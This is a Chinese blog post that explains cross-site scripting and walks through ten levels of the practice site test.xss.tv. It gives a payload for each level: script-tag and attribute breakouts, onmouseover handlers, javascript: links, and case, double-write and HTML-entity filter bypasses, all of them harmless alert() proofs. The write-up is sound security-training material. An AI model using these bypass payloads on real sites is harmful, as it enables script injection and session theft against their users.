WEB——XSS注入

前记

XSS攻击
通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
简述
人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。跨站脚本攻击(XSS),是目前最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
原理
HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签引入了一段JavaScript脚本时,这些脚本程序就将会在用户浏览器中执行。所以,当这些特殊字符不能被动态页面检查或检查出现失误时,就将会产生XSS漏洞。
题目网址:http://test.xss.tv/

level1


第一关就用最常用的攻击语句试试。
payload:

<script>alert(1)</script>

level2


观察源代码,发现需要把前面的<input>标签给闭合掉。
payload:

"><script>alert(/hacker/)</script>

level3


观察页面源代码,是单引号,在前面加'value给闭合掉。
payload:

' onmouseover='alert(1)

level4


这里是双引号,在前面输入",把value给闭合掉。
payload:

" onmouseover="alert(1)

level5


试试script,再看页面源代码,script被过滤了,那就用标签构造攻击语句试试。
payload:

"><a href="javascript:alert(1)">aa</a>//

level6


发现hrefscript都被过滤了,在上题基础上换大写试试。
payload:

"><a Href="javascript:alert(1)">aa</a>//

然后点击aa标签即可。

level7


用双写绕过,过滤掉其中的script,但是一旦过滤掉,前后又可以重新拼接起来,形成一个完整的语句。
payload:

"><sscriptcript>alert(/hacker/)</sscriptcript>

level8


下面有<a>标签,直接输入这个语句

javascript:alert(/hacker/)

但是script会被过滤,换一种方式表达script,采用HTML字符实体转换地址。
payload:

&#x006a;&#x0061;&#x0076;&#x0061;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003a;&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x0031;&#x0029;

level9


又是友情链接,发现输入的语句并没有进入到 <a>标签中,这里应该对格式有一定要求,查看其他博客后发现需要添加http://,否则不合法。
payload:

&#x006a;&#x0061;&#x0076;&#x0061;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003a;alert('http://')

level10

查看页面源代码,发现t_sort就是注入点,那就开始注入吧,代码中有隐藏的参数设置,把hidden改为text
payload:

&t_sort=8888" type="text" onmouseover="alert(666)


  Reprint please specify: clam WEB——XSS注入

 Previous
BUGKU——MISC BUGKU——MISC
杂项一(签到题)签到题没什么好说的,关注公众号即可。 杂项二(这是一张单纯的图片)保存图片然后用winhex打开发现unicode编码转化,在线工具得到flag 杂项三(隐写)下载压缩包,打开有一张图片。winhex打开图片发现把高改成和宽
2019-07-11 yxld
Next 
ISCC2019——MISC总结 ISCC2019——MISC总结
ISCC2019已经结束了,虽然做不出来几道题,但是经过后来的学习觉得还是有必要总结一下的。 MISC1(隐藏的信息)这道题主要是进制转换后再转ascll码,然后base解码首先考虑到每个数字的大小,就发现都是八进制,然后转为十进制然后十进
2019-06-05 yxld
  TOC